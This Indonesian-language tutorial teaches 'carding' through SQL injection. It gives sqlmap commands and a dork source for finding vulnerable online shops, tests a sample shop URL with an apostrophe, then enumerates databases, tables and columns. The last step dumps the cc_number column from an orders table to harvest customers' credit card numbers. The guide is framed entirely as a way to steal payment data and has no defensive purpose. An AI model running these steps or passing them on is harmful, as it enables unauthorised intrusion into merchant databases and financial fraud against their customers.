INJECTION (SQLI)
Alat-alat yang dibutuhkan:
1. sqlmap
2. dork carding ( bisa cari di
google ) / http://pastebin .com/TtrVQhH7
3. sqli scanner : http://www.tributemosthaunted. co.uk/store/test.php
Pertama ,ambil dork lalu scan menggunakan
sqli scanner
Setelah itu kita test URL target dengan
memberi kan tanda petik di belakang URL
http://www.zite.com/merchandise/
index.php?cat=268
menjadi :
http://www.zite.com/merchandise/
index.php?cat=268 '
Nah, web tersebut error saat kita inject.
Kedua, kita eksekusi menggunakan sqlmap
dengan perintah:
root@anonym:~# sqlmap -u http://
www.target.com --dbs
Contoh: sqlmap -u http://www.zite.com/
merchandise/index.php?cat=268 --dbs
Disini kita mendapatkan 3 database :
[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk
mencari table, dengan perintah:
root@anonym:~# sqlmap -u http://
www.target.com -D namadatabase --
tables (disini saya coba database
"balboast_gkgcart")
Contoh: sqlmap -u http://www.zite.com/
merchandise/index.php?cat=268 -D
balboast_gkgcart --tables
Nah, saya dapat tables nya.
Kita pilih di bagian "orders". Kita ambil
columns nya, masukan perintah:
root@anonym:~# sqlmap.py -u http://
www.target.com -D namadatabase -T
namatable --columns
Contoh: sqlmap -u http://www.zite.com/
merchandise/index.php?cat=268 -D
balboast_gkgcart -T orders --columns
Maka akan muncul database orders.
Nah, sudah muncul. Tinggal kita dump 1 per
1 columnsnya bro
Masukkan perintah:
root@anonym:~# sqlmap.py -u link -D
namadatabase -T namatable -C namakolom
--dump
Contoh: sqlmap -u http://www.zite.com/
merchandise/index.php?cat=268 -D
balboast_gkgcart -T orders -C cc_number --
dump
Maka nanti cc number akan muncul walau
proses agak lama.
